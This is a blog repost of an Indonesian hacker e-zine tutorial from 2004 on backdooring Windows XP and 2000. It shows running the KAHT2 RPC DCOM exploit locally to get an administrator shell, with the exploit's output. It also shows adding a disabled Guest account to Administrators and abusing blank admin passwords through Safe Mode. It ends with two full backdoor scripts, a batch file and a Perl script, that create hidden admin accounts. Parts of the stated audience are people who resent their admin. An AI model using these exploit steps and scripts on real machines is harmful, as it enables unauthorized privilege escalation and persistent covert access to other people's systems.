tag:blogger.com,1999:blog-311708932011-12-14T18:40:39.282-08:00Uj@nKhttp://www.blogger.com/profile/07125615494412928088noreply@blogger.comBlogger11100tag:blogger.com,1999:blog-31170893.post-1153666377260437902006-07-23T07:15:00.000-07:002006-12-25T10:49:31.620-08:00<pre><span style="font-size:130%;">\_ _____/\_ ___ \ / | \\_____ | __)_ / \ \// ~ \/ | | \\ \___ \/ \/ \/ \/<br /><br /><br /> .OR.ID<br />ECHO-ZINE RELEASE<br /> 05<br /><br />Author: y3dips || y3dips@echo.or.id || y3d1ps@telkom.net<br />Online @ www.echo.or.id :: http://ezine.echo.or.id<br /><br /><br />== Backd00ring WINDOS XP &&amp; 2000 ==<br /><br /><br /><br />Pengantar<br /><br /></span></pre> <div style="text-align: justify;"><span style="font-size:130%;"> Tulisan ini dibuat untuk membuktikan bahwa sabotase account admin<br /> pada windows juga dapat dilakukan secara lokal, bisa dengan<br />menggunakan software yang sama, atau bahkan tanpa software sama sekali<br />tulisan ini juga menyambung artikel yang di buat oleh the_day,<br />tetapi di khususkan untuk eksploitasi secara lokal .<br /></span></div> <pre><span style="font-size:130%;"><br /><br />artikel ini ditujukan untuk :<br />- buat yang lupa password admin :p<br />- buat yang mimpi pengen jadi admin :P<br />- buat yang dendam sama admin karena di curangin :)<br />- buat yang mau belajar exploitasi windows<br />- buat yang mau tau kebobrokan windows<br />- ..... (isi ndiri, kenapa kamu tertarik baca ini)<br /><br />bahan yang di perlukan :<br />-sploits RPC DCOM : *kaht2 (for windust)<br />-account user biasa or minimal Guest<br /><br />dari user biasa :<br /><br />1. ekstrak kaht2 yang dimiliki, biar mudah taruh aja di C: terus jalankan :<br />start > run > command ><br /><br />masuk ke c:\ipconfig or kalo males pake ip jaringan bisa pake<br />ip buat loopback yaitu 127.0.0.1<br /><br />ketik aja:<br />c:\kaht2 127.0.0.01 127.0.0.1<br /><br />_________________________________________________<br /> KAHT II - MASSIVE RPC EXPLOIT<br />DCOM RPC exploit. Modified by aT4r@3wdesign.es<br />#haxorcitos &&amp; #localhost @Efnet Ownz you!!!<br /> PUBLIC VERSION :P<br />________________________________________________<br /><br />[+] Targets: 127.0.0.0-127.0.0.1 with 50 Threads<br />[+] Attacking Port: 135. Remote Shell at port: 328<br />[+] Scan In Progress...<br />- Connecting to 127.0.0.1<br /> Sending Exploit to a [WinXP] Server...<br />- Conectando con la Shell Remota...<br /><br />Microsoft Windows XP [Version 5.1.2600]<br />(C) Copyright 1985-2001 Microsoft Corp.<br /><br />C:\WINDOWS\system32><br /><br /><br />masuk deh :D dengan account Administrator<br /><br />sekarang kamu mau ngapain? bikin backdoor aja or mau buat account baru<br />admin or jadiin account kamu admin ?<br /><br />a. bikin backdoor aja :D<br />kalo ini kamu kudu cari account yang gak di aktifkan sehingga user<br />tersebut gak terdeteksi pada halaman login user :P<br />biasanya account Guest yang dibuat tidak aktif padahal masih ada/default<br />nah kamu bisa jadikan ini backdoor kamu , semisal kamu mau remote or<br />login biasa :)<br /><br />gimana caranya ? belajar :P , just kiddding!<br /><br />kamu ketik sintax berikut ini , bair jelasnya kamu liat dulu account guest<br />ada apa kagak ? pake sintax net user<br /><br />C:\WINDOWS\system32>net user<br /><br />net user<br /><br />User accounts for ------------------------------------------------------------------------------<br />Administrator Guest HelpAssistant<br />SUPPORT_388945a0 y3dips<br />The command completed with one or more errors.<br /><br /><br /><br />(cat : lihat ada beberapa account yang tercipta di situ dan dapat di<br /> manfaatkan :P)<br /><br />YUPe, ternyata ada account guest, biar jelas apa dia aktif or kagak<br />kita ketik aje net user Guest<br /><br />C:\WINDOWS\system32>net user Guest<br />net user Guest<br />User name Guest<br />Full Name<br />Comment Built-in account for guest access to the computer/d<br />omain<br />User's comment<br />Country code 000 (System Default)<br />Account active No <br /><=====gak aktif :p Account expires Never Password last set 2/29/2004 3:58 AM Password expires Never Password changeable 2/29/2004 3:58 AM Password required No User may change password No Workstations allowed All Logon script User profile Home directory Last logon 2/29/2004 3:42 AM Logon hours allowed All Local Group Memberships *Guests Global Group memberships *None The command completed successfully. hehehehe, ternyata gak aktif euy.. sekarang kita jadikan backdoor pake perintah C:\WINDOWS\system32>net localgroup Administrators Guest /add<br /><br />menjadikan user Guest menjadi group Administrators.<br /><br />oke! kelar sudah jika kita perlu sekali-sekali maka tinggal memakai<br />account ini, awas jangan sampai di ambil orang lo...<br />or mau dikasih password aja, biar lebih asyik :D<br /><br /><br />b. buat account sebagai admin<br /><br />setelah dapet command prompt sebagai admin hasil dari eksploitasi dengan<br />kaht2 atau echokillrpc, maka tinggal jalankan exploits echobacd00r.bat<br />atau echobackd00r.exe yang dapat anda letakkan pada disket atau telah<br />copikan ke C:\Windows\system32<br />sehingga tinggal ketik<br /><br />c:\windows\system32\echobacd00r.bat<br /><br /> selesai!!!<br /><br /> atau jika anda tidak menggunakan echobackd00r.bat atau echobackd00r.exe<br /> anda dapat mengetikkan secara manual dengan penggunaan net user dan<br /> net localgroup, untuk detilnya sama seperti pembuatan account admin<br /> pada artikel the_day tentang hacking windows 2000<br /><br /><br /><br />2 . Ekploitasi karena kelemahan windust apabila saat installasi gak<br /> ngisiin password admin (inget gak!!)<br /><br /> cara termudah adalah kamu masuk ke windows, saat booting tekan<br /> F8, terus pilih safe mode dengan command prompt<br /> setelah itu mausk deh ke account admin, :P<br /><br /> pake command prompt dan perintah net user untuk add user dan<br /> pake sintax net localgroup untuk jadikan user tsb admin ..<br /><br />cat: terbukti pada beberapa pc yang di install di komputer<br /> tempat bekerja yang ternyata dibiartkan dengan admin yang<br /> tak berpassword :D,<br /> (keasyikan buat click-click duang kali )<br /><br /><br />3. Eksploitasi lokal dengan menggunakan :<br /> 1. Disk bootable,+ echobackd00r.bat/echobackd00r.exe (jika ada)<br /> 2. Eksploits kaht2<br /><br /> masukkan disket,<br /> apabila masuk ke command prompt maka silakan eksekusi langsung kaht2nya<br /> <br /> selanjutnya tinggal modifikasi account yang ada atau ciptakan account baru<br /> (dapat menggunakan echobackd00r.bat atau secara manual)<br /><br /><br /> cara ini dilakukan jika cara 1 dan 2 tidak bisa di lakukan<br /> (cat : cara 1: account user biasa gak ada, cara 2: account admin<br /> dengan F8 diberi password)<br /><br />[perintah net user ]<br /><br />NET USER<br />[username [password | *] [options]] [/DOMAIN]<br /> username {password | *} /ADD [options] [/DOMAIN]<br /> username [/DELETE] [/DOMAIN]<br /><br />NET USER creates and modifies user accounts on computers. When used<br />without switches, it lists the user accounts for the computer. The<br />user account information is stored in the user accounts database.<br /><br />This command works only on servers.<br /><br /><br />username Is the name of the user account to add, delete, modify, or<br /> view. The name of the user account can have as many as<br /> 20 characters.<br />password Assigns or changes a password for the user's account.<br /> A password must satisfy the minimum length set with the<br /> /MINPWLEN option of the NET ACCOUNTS command. It can have as<br /> many as 14 characters.<br />* Produces a prompt for the password. The password is not<br /> displayed when you type it at a password prompt.<br />/DOMAIN Performs the operation on a domain controller of<br /> the current domain.<br />/ADD Adds a user account to the user accounts database.<br />/DELETE Removes a user account from the user accounts database.<br /><br />Options Are as follows:<br /><br />Options Description<br />--------------------------------------------------------------------<br />/ACTIVE:{YES | NO} Activates or deactivates the account. If<br /> the account is not active, the user cannot<br /> access the server. The default is YES.<br />/COMMENT:"text" Provides a descriptive comment about the<br /> user's account (maximum of 48 characters).<br /> Enclose the text in quotation marks.<br />/COUNTRYCODE:nnn Uses the operating system country code to<br /> implement the specified language files for a<br /> user's help and error messages. A value of<br /> 0 signifies the default country code.<br />/EXPIRES:{date | NEVER} Causes the account to expire if date is<br /> set. NEVER sets no time limit on the<br /> account. An expiration date is in the<br /> form mm/dd/yy or dd/mm/yy, depending on the<br /> country code. Months can be a number,<br /> spelled out, or abbreviated with three<br /> letters. Year can be two or four numbers.<br /> Use slashes(/) (no spaces) to separate<br /> parts of the date.<br />/FULLNAME:"name" Is a user's full name (rather than a<br /> username). Enclose the name in quotation<br /> marks.<br />/HOMEDIR:pathname Sets the path for the user's home directory.<br /> The path must exist.<br />/PASSWORDCHG:{YES | NO} Specifies whether users can change their<br /> own password. The default is YES.<br />/PASSWORDREQ:{YES | NO} Specifies whether a user account must have<br /> a password. The default is YES.<br />/PROFILEPATH[:path] Sets a path for the user's logon profile.<br />/SCRIPTPATH:pathname Is the location of the user's logon<br /> script.<br />/TIMES:{times | ALL} Is the logon hours. TIMES is expressed as<br /> day[-day][,day[-day]],time[-time][,time<br /> [-time]], limited to 1-hour increments.<br /> Days can be spelled out or abbreviated.<br /> Hours can be 12- or 24-hour notation. For<br /> 12-hour notation, use am, pm, a.m., or<br /> p.m. ALL means a user can always log on,<br /> and a blank value means a user can never<br /> log on. Separate day and time entries with<br /> a comma, and separate multiple day and time<br /> entries with a semicolon.<br />/USERCOMMENT:"text" Lets an administrator add or change the User<br /> Comment for the account.<br />/WORKSTATIONS:{computername[,...] | *}<br /> Lists as many as eight computers from<br /> which a user can log on to the network. If<br /> /WORKSTATIONS has no list or if the list is *,<br /> the user can log on from any computer.<br /><br />NET HELP command | MORE displays Help one screen at a time.<br /><br /><br />: :berikut di cantumkan 2 buah script backd00r<br /><br />[echobackd00r.bat]<br /><br />cut here &<----------------------------------------------------------- rem *echobackd00r.bat rem *Maret 2004 - backd00r untuk XP &amp;& 2000 rem *dibuat untuk mempermudah menciptakan account admin rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2 rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal rem *cara pakai, ubah dulu USER="backdoor" rem *cara pakai, ubah dulu PASS="password" rem *MULAI. @echo off PROMPT $P$G cls Color 87 GOto iklan :setting rem *ganti USER dan PASS set USER="backdoor" set PASS="password" if %USER%=="backdoor" Goto gagal else GOto proses :proses rem *masuk ke perintah tuk nambahin user + passwordnya net user %USER% %PASS% /add net localgroup Administrators %USER% /add net localgroup Users %USER% /delete cls echo. echo Account %USER% dengan password %PASS% telah berhasil di buat! color 70 EXIT :iklan rem * just a banner from me :) , bisa di hilangkan :p echo. echo ##################################################### echo # # echo # Echobackd00r # echo # dibuat dan di coba oleh y3dips with XP OS # echo # greetz to :the_day for idea, moby, z3r0byt3,comex # echo # note: ubah USER dan PASS # echo # # echo ##################################################### echo. echo tekan ENTER !!! pause>nul<br /><br />Goto setting :gagal<br /><br />echo.<br />echo edit file echobackd00r.bat dan ubah USER dan PASSnya<br />echo.<br /><br /><br />rem *SELESAI.<br />rem *created by y3dips : maret 2004 : http://echo.or.id<br /><br /><br />cut here &amp;<----------------------------------------------------------- [echobackd00r.pl > ubah ke exe dengan perl2exe]<br /><br />cut here &<----------------------------------------------------------- # echobackd00r.pl digunakan untuk membuat account admin pada Windows XP, 2000 # kombinasikan dengan sploits RPC DCOM seperti KAHT2 dsb # ubah ke exe dengan perl2exe #!/usr/bin/perl printf"\n *********\n"; print " * *\n"; print " * Echobackd00r *\n"; print " * created &&amp; tested by y3dips on XP Operating Sys *\n"; print " * greetz : the_day (untuk idenya), moby, comex, z3r0byt3 *\n"; print " * echo-memberz, newbie_hacker, puji_tiwili* *\n"; print " * *\n"; printf" **********************************************************\n\n"; if(@ARGV == 2) { $uname = $ARGV[0]; $password = $ARGV[1]; { system(" net user $uname $password /add "); system(" net localgroup Administrators $uname /add "); system(" net localgroup Users $uname /delete "); } } else { print " [Gunakan] echobackd00r.exe username password \n"; } # end. # created by y3dips : download from http://echo.or.id cut here &<----------------------------------------------------------- EOF. Penutup. tulisan ini tetap seperti tulisan-tulisan terdahulu yang ditujukan untuk pendidikan dan bertujuan untuk membukakan mata kita semua terhadap pentingnya security, segala bentuk penyalahgunaan adalah bukan merupakan tanggung jawab penulis . *greetz to: [echostaff a.k.a moby, the_day, comex ,z3r0byt3], echo memberz, anak anak newbie_hacker,$peci@l temen2 seperjuangan kirimkan kritik &amp;amp;amp;&amp; saran ke y3dips[at]echo.or.id */ 0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004</span></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/31170893-115366637726043790?l=ujank-programer.blogspot.com' alt='' /></div>Uj@nKhttp://www.blogger.com/profile/07125615494412928088noreply@blogger.com1